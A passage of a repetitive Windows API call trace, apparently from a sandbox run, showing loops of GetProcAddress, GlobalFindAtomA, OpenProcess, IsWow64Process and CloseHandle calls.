	[0136.235] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.235] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.235] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.236] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.236] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.236] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.236] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.236] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.236] CloseHandle (hObject=0x2dc) returned 1
	[0136.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.236] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.236] CloseHandle (hObject=0x2dc) returned 1
	[0136.237] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.237] CloseHandle (hObject=0x2dc) returned 1
	[0136.237] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.237] CloseHandle (hObject=0x2dc) returned 1
	[0136.237] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.237] CloseHandle (hObject=0x2dc) returned 1
	[0136.237] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.237] CloseHandle (hObject=0x2dc) returned 1
	[0136.270] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.270] CloseHandle (hObject=0x2dc) returned 1
	[0136.271] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.271] CloseHandle (hObject=0x2dc) returned 1
	[0136.271] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.271] CloseHandle (hObject=0x2dc) returned 1
	[0136.271] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.271] CloseHandle (hObject=0x2dc) returned 1
	[0136.271] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.271] CloseHandle (hObject=0x2dc) returned 1
	[0136.272] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.272] CloseHandle (hObject=0x2dc) returned 1
	[0136.272] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.272] CloseHandle (hObject=0x2dc) returned 1
	[0136.272] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.272] CloseHandle (hObject=0x2dc) returned 1
	[0136.272] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.272] CloseHandle (hObject=0x2dc) returned 1
	[0136.273] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.273] CloseHandle (hObject=0x2dc) returned 1
	[0136.273] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.273] CloseHandle (hObject=0x2dc) returned 1
	[0136.273] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.273] CloseHandle (hObject=0x2dc) returned 1
	[0136.273] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.273] CloseHandle (hObject=0x2dc) returned 1
	[0136.273] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.273] CloseHandle (hObject=0x2dc) returned 1
	[0136.274] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.274] CloseHandle (hObject=0x2dc) returned 1
	[0136.274] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.274] CloseHandle (hObject=0x2dc) returned 1
	[0136.274] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.274] CloseHandle (hObject=0x2dc) returned 1
	[0136.274] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.274] CloseHandle (hObject=0x2dc) returned 1
	[0136.275] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.275] CloseHandle (hObject=0x2dc) returned 1
	[0136.275] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.275] CloseHandle (hObject=0x2dc) returned 1
	[0136.275] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.275] CloseHandle (hObject=0x2dc) returned 1
	[0136.275] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.275] CloseHandle (hObject=0x2dc) returned 1
	[0136.275] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.275] CloseHandle (hObject=0x2dc) returned 1
	[0136.276] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.276] CloseHandle (hObject=0x2dc) returned 1
	[0136.276] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.276] CloseHandle (hObject=0x2dc) returned 1
	[0136.276] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.276] CloseHandle (hObject=0x2dc) returned 1
	[0136.276] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.276] CloseHandle (hObject=0x2dc) returned 1
	[0136.277] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.277] CloseHandle (hObject=0x2dc) returned 1
	[0136.277] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.277] CloseHandle (hObject=0x2dc) returned 1
	[0136.277] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.277] CloseHandle (hObject=0x2dc) returned 1
	[0136.277] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.278] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.278] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.278] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.278] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.278] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.279] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.279] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.279] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.279] CloseHandle (hObject=0x2dc) returned 1
	[0136.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.279] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.279] CloseHandle (hObject=0x2dc) returned 1
	[0136.279] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.279] CloseHandle (hObject=0x2dc) returned 1
	[0136.280] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.280] CloseHandle (hObject=0x2dc) returned 1
	[0136.280] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.280] CloseHandle (hObject=0x2dc) returned 1
	[0136.280] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.280] CloseHandle (hObject=0x2dc) returned 1
	[0136.313] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.313] CloseHandle (hObject=0x2dc) returned 1
	[0136.313] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.313] CloseHandle (hObject=0x2dc) returned 1
	[0136.313] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.313] CloseHandle (hObject=0x2dc) returned 1
	[0136.313] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.314] CloseHandle (hObject=0x2dc) returned 1
	[0136.314] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.314] CloseHandle (hObject=0x2dc) returned 1
	[0136.314] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.314] CloseHandle (hObject=0x2dc) returned 1
	[0136.314] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.314] CloseHandle (hObject=0x2dc) returned 1
	[0136.314] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.314] CloseHandle (hObject=0x2dc) returned 1
	[0136.315] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.315] CloseHandle (hObject=0x2dc) returned 1
	[0136.315] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.315] CloseHandle (hObject=0x2dc) returned 1
	[0136.315] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.315] CloseHandle (hObject=0x2dc) returned 1
	[0136.315] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.315] CloseHandle (hObject=0x2dc) returned 1
	[0136.316] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.316] CloseHandle (hObject=0x2dc) returned 1
	[0136.316] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.316] CloseHandle (hObject=0x2dc) returned 1
	[0136.316] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.316] CloseHandle (hObject=0x2dc) returned 1
	[0136.316] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.316] CloseHandle (hObject=0x2dc) returned 1
	[0136.317] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.317] CloseHandle (hObject=0x2dc) returned 1
	[0136.317] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.317] CloseHandle (hObject=0x2dc) returned 1
	[0136.317] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.317] CloseHandle (hObject=0x2dc) returned 1
	[0136.317] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.317] CloseHandle (hObject=0x2dc) returned 1
	[0136.318] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.318] CloseHandle (hObject=0x2dc) returned 1
	[0136.318] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.318] CloseHandle (hObject=0x2dc) returned 1
	[0136.318] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.318] CloseHandle (hObject=0x2dc) returned 1
	[0136.318] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.318] CloseHandle (hObject=0x2dc) returned 1
	[0136.319] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.319] CloseHandle (hObject=0x2dc) returned 1
	[0136.319] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.319] CloseHandle (hObject=0x2dc) returned 1
	[0136.319] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.319] CloseHandle (hObject=0x2dc) returned 1
	[0136.320] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.320] CloseHandle (hObject=0x2dc) returned 1
	[0136.320] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.320] CloseHandle (hObject=0x2dc) returned 1
	[0136.320] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.320] CloseHandle (hObject=0x2dc) returned 1
	[0136.320] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.321] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.321] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.321] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.321] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.321] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.322] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.322] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.322] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.322] CloseHandle (hObject=0x2dc) returned 1
	[0136.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.322] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.322] CloseHandle (hObject=0x2dc) returned 1
	[0136.322] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.323] CloseHandle (hObject=0x2dc) returned 1
	[0136.323] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.323] CloseHandle (hObject=0x2dc) returned 1
	[0136.323] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.323] CloseHandle (hObject=0x2dc) returned 1
	[0136.323] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.323] CloseHandle (hObject=0x2dc) returned 1
	[0136.356] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.356] CloseHandle (hObject=0x2dc) returned 1
	[0136.356] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.356] CloseHandle (hObject=0x2dc) returned 1
	[0136.357] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.357] CloseHandle (hObject=0x2dc) returned 1
	[0136.357] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.357] CloseHandle (hObject=0x2dc) returned 1
	[0136.357] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.357] CloseHandle (hObject=0x2dc) returned 1
	[0136.357] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.357] CloseHandle (hObject=0x2dc) returned 1
	[0136.357] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.358] CloseHandle (hObject=0x2dc) returned 1
	[0136.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.358] CloseHandle (hObject=0x2dc) returned 1
	[0136.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.358] CloseHandle (hObject=0x2dc) returned 1
	[0136.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.358] CloseHandle (hObject=0x2dc) returned 1
	[0136.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.358] CloseHandle (hObject=0x2dc) returned 1
	[0136.359] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.359] CloseHandle (hObject=0x2dc) returned 1
	[0136.359] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.359] CloseHandle (hObject=0x2dc) returned 1
	[0136.359] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.359] CloseHandle (hObject=0x2dc) returned 1
	[0136.359] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.360] CloseHandle (hObject=0x2dc) returned 1
	[0136.360] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.360] CloseHandle (hObject=0x2dc) returned 1
	[0136.360] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.360] CloseHandle (hObject=0x2dc) returned 1
	[0136.360] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.360] CloseHandle (hObject=0x2dc) returned 1
	[0136.360] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.360] CloseHandle (hObject=0x2dc) returned 1
	[0136.361] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.361] CloseHandle (hObject=0x2dc) returned 1
	[0136.361] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.361] CloseHandle (hObject=0x2dc) returned 1
	[0136.361] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.361] CloseHandle (hObject=0x2dc) returned 1
	[0136.361] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.361] CloseHandle (hObject=0x2dc) returned 1
	[0136.362] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.362] CloseHandle (hObject=0x2dc) returned 1
	[0136.362] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.362] CloseHandle (hObject=0x2dc) returned 1
	[0136.362] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.362] CloseHandle (hObject=0x2dc) returned 1
	[0136.362] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.362] CloseHandle (hObject=0x2dc) returned 1
	[0136.363] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.363] CloseHandle (hObject=0x2dc) returned 1
	[0136.363] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.363] CloseHandle (hObject=0x2dc) returned 1
	[0136.363] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.363] CloseHandle (hObject=0x2dc) returned 1
	[0136.364] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.364] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.364] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.364] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.364] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.365] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.365] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.365] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.365] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.365] CloseHandle (hObject=0x2dc) returned 1
	[0136.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.365] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.365] CloseHandle (hObject=0x2dc) returned 1
	[0136.365] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.366] CloseHandle (hObject=0x2dc) returned 1
	[0136.366] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.366] CloseHandle (hObject=0x2dc) returned 1
	[0136.366] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.366] CloseHandle (hObject=0x2dc) returned 1
	[0136.366] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.366] CloseHandle (hObject=0x2dc) returned 1
	[0136.399] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.400] CloseHandle (hObject=0x2dc) returned 1
	[0136.400] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.400] CloseHandle (hObject=0x2dc) returned 1
	[0136.400] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.400] CloseHandle (hObject=0x2dc) returned 1
	[0136.400] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.400] CloseHandle (hObject=0x2dc) returned 1
	[0136.401] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.401] CloseHandle (hObject=0x2dc) returned 1
	[0136.401] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.401] CloseHandle (hObject=0x2dc) returned 1
	[0136.401] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.401] CloseHandle (hObject=0x2dc) returned 1
	[0136.401] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.401] CloseHandle (hObject=0x2dc) returned 1
	[0136.402] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.402] CloseHandle (hObject=0x2dc) returned 1
	[0136.402] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.402] CloseHandle (hObject=0x2dc) returned 1
	[0136.402] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.402] CloseHandle (hObject=0x2dc) returned 1
	[0136.402] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.402] CloseHandle (hObject=0x2dc) returned 1
	[0136.402] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.402] CloseHandle (hObject=0x2dc) returned 1
	[0136.403] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.403] CloseHandle (hObject=0x2dc) returned 1
	[0136.403] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.403] CloseHandle (hObject=0x2dc) returned 1
	[0136.403] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.403] CloseHandle (hObject=0x2dc) returned 1
	[0136.403] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.403] CloseHandle (hObject=0x2dc) returned 1
	[0136.404] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.404] CloseHandle (hObject=0x2dc) returned 1
	[0136.404] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.404] CloseHandle (hObject=0x2dc) returned 1
	[0136.404] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.404] CloseHandle (hObject=0x2dc) returned 1
	[0136.404] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.404] CloseHandle (hObject=0x2dc) returned 1
	[0136.404] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.404] CloseHandle (hObject=0x2dc) returned 1
	[0136.405] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.405] CloseHandle (hObject=0x2dc) returned 1
	[0136.405] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.405] CloseHandle (hObject=0x2dc) returned 1
	[0136.405] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.405] CloseHandle (hObject=0x2dc) returned 1
